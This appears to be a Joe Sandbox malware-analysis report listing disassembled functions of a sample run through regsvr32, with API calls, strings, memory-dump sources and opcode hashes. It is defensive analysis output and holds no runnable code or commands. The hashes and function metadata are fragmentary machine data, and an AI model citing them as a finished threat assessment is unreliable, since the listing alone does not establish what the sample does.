                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Handle$CloseConsoleErrorLastMode
                                                                  • String ID: called `Result::unwrap()` on an `Err` value
                                                                  • API String ID: 1170577072-2333694755
                                                                  • Opcode ID: a286046e61007102d2377bec1cd2176bdb511f51476697ae9a74c5b71084a485
                                                                  • Instruction ID: 65d9700e9e6fa2ea2c5bf9c4a9722ea94fced5ec16b642f5e21aaf03dccea8c6
                                                                  • Opcode Fuzzy Hash: a286046e61007102d2377bec1cd2176bdb511f51476697ae9a74c5b71084a485
                                                                  • Instruction Fuzzy Hash: 958128708042489BDB20CFA5C980BDEBFB5AF56348F148D5AE8A17BB41D736D586CB70
                                                                  Function 6C948250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • Error cleaning up spin_keys for thread , xrefs: 6C948287
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDebugOutputStringThread_ultoaabort
                                                                  • String ID: Error cleaning up spin_keys for thread
                                                                  • API String ID: 4191895893-2906507043
                                                                  • Opcode ID: 2620f5de96dea6be2474176b135cc746c25c40acebf892b6e96c2feb58e77487
                                                                  • Instruction ID: 841f3f194f0e450f664cca161e54d652510ab928994ff6c58ee6cb0cf6401699
                                                                  • Opcode Fuzzy Hash: 2620f5de96dea6be2474176b135cc746c25c40acebf892b6e96c2feb58e77487
                                                                  • Instruction Fuzzy Hash: C711027160C7409BDB006B78D88471BBEE4AB86328F548A2AE090C7791C775C545C79A
                                                                  Function 6C8F8AE0 Relevance: 7.7, APIs: 5, Instructions: 227threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InitializeProcThreadAttributeList.KERNEL32(00000000,00000006,00000000,00000000), ref: 6C8F8B04
                                                                  • InitializeProcThreadAttributeList.KERNEL32(00000001,?,00000000,00000000,00000000,00000006,00000000,00000000), ref: 6C8F8B9A
                                                                  • UpdateProcThreadAttribute.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000001,?,00000000,00000000,00000000,00000006,00000000,00000000), ref: 6C8F8C8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AttributeProcThread$InitializeList$Update
                                                                  • String ID:
                                                                  • API String ID: 3806694049-0
                                                                  • Opcode ID: e0b9b6e428172376da871e161a6df9a611cacfc0882d473f19ad2674c197ccf2
                                                                  • Instruction ID: cb69d479403cb409ca90d1e20ecf382de6b04d89f21672231459be0389cfc7a3
                                                                  • Opcode Fuzzy Hash: e0b9b6e428172376da871e161a6df9a611cacfc0882d473f19ad2674c197ccf2
                                                                  • Instruction Fuzzy Hash: B8717731A012149BDF20CFA5C980BFBB7B5FF16348F15496AE818AB741D772E846C7A0
                                                                  Function 6C9466F0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95d943797c5de33cf6e30557c083e91ee023b08883930c0a895e525a8404f6a1
                                                                  • Instruction ID: 3938a6a1f8f92defc6b960b5480d70b9bbdb3eae90ffcc892cc020e53b1c882f
                                                                  • Opcode Fuzzy Hash: 95d943797c5de33cf6e30557c083e91ee023b08883930c0a895e525a8404f6a1
                                                                  • Instruction Fuzzy Hash: 556188B56093048FD700CF29C48065AB7F9BF99708F44CA6EE898DBB14E774D90ACB56
                                                                  Function 6C862460 Relevance: 7.7, APIs: 5, Instructions: 165COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NetGroupEnum.NETAPI32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000), ref: 6C8624EB
                                                                  • NetGroupGetInfo.NETAPI32(00000000,00000000,00000003,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,000000FF), ref: 6C862542
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Group$EnumInfo
                                                                  • String ID:
                                                                  • API String ID: 432415500-0
                                                                  • Opcode ID: 5e84e2d3397431715ac572703e933ba48da65b57c9f3568f1fce1d4be9fb0ce8
                                                                  • Instruction ID: c5e3668f1130641ba6b181b4469fb54e73987e8c2389dc69f2c29594eac98321
                                                                  • Opcode Fuzzy Hash: 5e84e2d3397431715ac572703e933ba48da65b57c9f3568f1fce1d4be9fb0ce8
                                                                  • Instruction Fuzzy Hash: D85163B1E012099FDB10CF95D988BEEB7B4BF58318F1485A9E814ABB81E735DD05CB90
                                                                  Function 6C8BD390 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 155COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  • assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 6C8BDA49, 6C8BDA93
                                                                  • assertion failed: new_left_len <= CAPACITY, xrefs: 6C8BD36E, 6C8BDA31
                                                                  • assertion failed: old_left_len + count <= CAPACITY, xrefs: 6C8BD091
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: memmove
                                                                  • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
                                                                  • API String ID: 2162964266-3535459961
                                                                  • Opcode ID: be8e9a54e68a60071c9c3f1c079dc551bf8670ede1602f3f90179eadb874eeff
                                                                  • Instruction ID: 6d8e1bf7c2f3f144f1217149b2378e761ca09949a848e5d924f2755615494001
                                                                  • Opcode Fuzzy Hash: be8e9a54e68a60071c9c3f1c079dc551bf8670ede1602f3f90179eadb874eeff
                                                                  • Instruction Fuzzy Hash: B4718B70D01B198BCB21CF59C980BEAB7B9FF89304F1486AED8496B306D731AA45CB50
                                                                  Function 6C947600 Relevance: 7.6, APIs: 5, Instructions: 108threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C947640
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentThread
                                                                  • String ID:
                                                                  • API String ID: 2882836952-0
                                                                  • Opcode ID: a25efd61e7f1da03d8e8972d5812c359eb01d80674edf24256623fc5986dd0ac
                                                                  • Instruction ID: 2843e2878da994dd4e6d943b5d2265115178e148d8320bf761986a89a9d5a7fd
                                                                  • Opcode Fuzzy Hash: a25efd61e7f1da03d8e8972d5812c359eb01d80674edf24256623fc5986dd0ac
                                                                  • Instruction Fuzzy Hash: 5D31C4317042058BEB006F6DD88475B77EAEB80368F28C979D948CFA45EB36C840CBD2
                                                                  Function 02633C80 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • recv.WS2_32(?,?,00000598,00000000), ref: 02633C9F
                                                                  • SetLastError.KERNEL32(00000000,?,00000001,?,02633AB7), ref: 02633CDA
                                                                  • GetLastError.KERNEL32 ref: 02633D25
                                                                  • WSAGetLastError.WS2_32(?,00000001,?,02633AB7), ref: 02633D5B
                                                                  • WSASetLastError.WS2_32(0000000D,?,00000001,?,02633AB7), ref: 02633D82
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$recv
                                                                  • String ID:
                                                                  • API String ID: 316788870-0
                                                                  • Opcode ID: 4ba2408b7629b99c71698248f90823044debc3fed0daeb613643dfe7bddc3e00
                                                                  • Instruction ID: aa5c2e40b338a39f5282e2b1a9712b15511bc0c1a15e4521236deb56e495c17b
                                                                  • Opcode Fuzzy Hash: 4ba2408b7629b99c71698248f90823044debc3fed0daeb613643dfe7bddc3e00
                                                                  • Instruction Fuzzy Hash: 0B310876A042009FEB659F68D8C876937A9FB44324F5005AAED06CB385D735D8E1CBD0
                                                                  Function 02634050 Relevance: 7.6, APIs: 5, Instructions: 78memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02634064
                                                                    • Part of subcall function 02631420: HeapFree.KERNEL32(?,00000000,?,?,?,026340A1,?,00000000,02634029,?,02645054,02633628), ref: 0263143D
                                                                    • Part of subcall function 02631420: _free.LIBCMT ref: 02631459
                                                                  • HeapDestroy.KERNEL32(?,?,00000000,02634029,?,02645054,02633628), ref: 026340A9
                                                                  • HeapCreate.KERNEL32(?,?,?,?,00000000,02634029,?,02645054,02633628), ref: 026340C4
                                                                  • SetEvent.KERNEL32(?,?,00000000,02634029,?,02645054,02633628), ref: 02634140
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02634147
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CriticalSection$CreateDestroyEnterEventFreeLeave_free
                                                                  • String ID:
                                                                  • API String ID: 1767077271-0
                                                                  • Opcode ID: 4a3da7fb678c79a6339a377ee68fef72df8bff35a4f9b6ffb2c68e72344071ae
                                                                  • Instruction ID: db54e0bcd3646886469acae9f6f3ddb8b6a1389f444473de004e4230ef1c87db
                                                                  • Opcode Fuzzy Hash: 4a3da7fb678c79a6339a377ee68fef72df8bff35a4f9b6ffb2c68e72344071ae
                                                                  • Instruction Fuzzy Hash: EC312678600A46AFD705DB78C898BAAF7E9FF48310F148659E42AC7250CB35B865CFD0
                                                                  Function 6C8FD850 Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(6C9CA114,00000000,?,6C8EA257,6C9CA118,00000000), ref: 6C8FD87C
                                                                  • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(6C9CA11C,00000000,?,6C8EA257,6C9CA118,00000000), ref: 6C8FD8BA
                                                                  • WakeByAddressAll.API-MS-WIN-CORE-SYNCH-L1-2-0(6C9CA118,?,6C8EA257,6C9CA118,00000000), ref: 6C8FD8CE
                                                                  • TlsSetValue.KERNEL32(00000000,00000001,00000000,00000000,?,6C98426C,00000024,6C984290,00000000,?,6C8EA257,6C9CA118,00000000), ref: 6C8FD8FE
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,6C8EA257,6C9CA118,00000000), ref: 6C8FD913
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressWake$SingleValue
                                                                  • String ID:
                                                                  • API String ID: 1317188499-0
                                                                  • Opcode ID: 8f14fa707657847e121040e1bd8e8b4f193dc0c83e4907926c9ef6c0f4f6b3f6
                                                                  • Instruction ID: 4fd76a15b389ebfee826f4da9d0b7d3cbc68015c93f3ee927945eec09c57481a
                                                                  • Opcode Fuzzy Hash: 8f14fa707657847e121040e1bd8e8b4f193dc0c83e4907926c9ef6c0f4f6b3f6
                                                                  • Instruction Fuzzy Hash: E51136303041296BDB261E559900BD673A89F4936EF108C3EF75EDBA80CF20A44387C5
                                                                  Function 6C892ED0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantToPropVariant.PROPSYS(?), ref: 6C892EED
                                                                  • PropVariantToBSTR.PROPSYS(?,00000000), ref: 6C892F2C
                                                                  • PropVariantClear.OLE32(?), ref: 6C892F56
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 6C892F83
                                                                  • PropVariantClear.OLE32(?), ref: 6C892F89
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Prop$Clear$FreeString
                                                                  • String ID:
                                                                  • API String ID: 2508621922-0
                                                                  • Opcode ID: 63a484797ddb0f828f98ce2d9f9b8e43d88344ee41d09c571d9cc26e6d5aac0e
                                                                  • Instruction ID: 361cdcdef94d9a3af7f617353998706ee0e7b120ba7837d687052bd8e166b0f6
                                                                  • Opcode Fuzzy Hash: 63a484797ddb0f828f98ce2d9f9b8e43d88344ee41d09c571d9cc26e6d5aac0e
                                                                  • Instruction Fuzzy Hash: A321AFB19087459BD720CF29C944A9BF7F8FFA8214F008A2EF499A7610E770D5458752
                                                                  Function 0263E617 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 0263E625
                                                                    • Part of subcall function 02637043: __FF_MSGBANNER.LIBCMT ref: 0263705C
                                                                    • Part of subcall function 02637043: __NMSG_WRITE.LIBCMT ref: 02637063
                                                                    • Part of subcall function 02637043: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 02637088
                                                                  • _free.LIBCMT ref: 0263E638
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free_malloc
                                                                  • String ID:
                                                                  • API String ID: 1020059152-0
                                                                  • Opcode ID: 917929ce2ead8fdfb053d0a4a5c2090d309fdc116ca0e1980830da503adefb97
                                                                  • Instruction ID: a3d6ecb74598aee861a2637182da48e84d9dda5dc91afeeb81097a707c7d9c50
                                                                  • Opcode Fuzzy Hash: 917929ce2ead8fdfb053d0a4a5c2090d309fdc116ca0e1980830da503adefb97
                                                                  • Instruction Fuzzy Hash: 27110676C40611ABCB232F74A80475D7B96AF52361B344929F8959B240DF36C4918FA8
                                                                  Function 04F87AB0 Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 955811338-0
                                                                  • Opcode ID: 77de361b4cd7367567e0d369d8c6b3654e3291b6ddb4abbe59ddb5ccefd4c70a
                                                                  • Instruction ID: b3e0c26f206c535069aa5479246ba1a94883e162a854a351ffe795af295bbc92
                                                                  • Opcode Fuzzy Hash: 77de361b4cd7367567e0d369d8c6b3654e3291b6ddb4abbe59ddb5ccefd4c70a
                                                                  • Instruction Fuzzy Hash: 4911E532604706AFEB10BFA5EC40E9B7BE9EF84768720002DF9149E151DB71F40387A1
                                                                  Function 6C94CA30 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: _lock_unlockcalloc
                                                                  • String ID:
                                                                  • API String ID: 3876498383-0
                                                                  • Opcode ID: ab13595c569d6116c3506e4665726baeaa60c1a24c9c98289cb0a5977b08b006
                                                                  • Instruction ID: b012cf26fb7ca6a5577a487856e1fa49046956c5866d9a1b44473705fd3572fd
                                                                  • Opcode Fuzzy Hash: ab13595c569d6116c3506e4665726baeaa60c1a24c9c98289cb0a5977b08b006
                                                                  • Instruction Fuzzy Hash: A61119702452118FD700EF68C88075ABBE4FF95394F15C669D898DB785EB34D848CBA2
                                                                  Function 6C892520 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: String$memcmp
                                                                  • String ID:
                                                                  • API String ID: 2223658989-0
                                                                  • Opcode ID: 3181424c49076631bd1776d0c5497c08c48a04e7cc7cfef1ad3c5c21fed26948
                                                                  • Instruction ID: c5531d0a0da7b1bfc093e0703853b3943ee84250a98520b739cdd46db2849290
                                                                  • Opcode Fuzzy Hash: 3181424c49076631bd1776d0c5497c08c48a04e7cc7cfef1ad3c5c21fed26948
                                                                  • Instruction Fuzzy Hash: FF01D6B3B013146BEB209D7E8C84AAB7BDCAF59278B054874EC08E7701E739CC0482E0
                                                                  Function 04F93D48 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __CreateFrameInfo.LIBCMT ref: 04F93D70
                                                                    • Part of subcall function 04F93900: __getptd.LIBCMT ref: 04F9390E
                                                                    • Part of subcall function 04F93900: __getptd.LIBCMT ref: 04F9391C
                                                                  • __getptd.LIBCMT ref: 04F93D7A
                                                                    • Part of subcall function 04F8A108: __getptd_noexit.LIBCMT ref: 04F8A10B
                                                                    • Part of subcall function 04F8A108: __amsg_exit.LIBCMT ref: 04F8A118
                                                                  • __getptd.LIBCMT ref: 04F93D88
                                                                  • __getptd.LIBCMT ref: 04F93D96
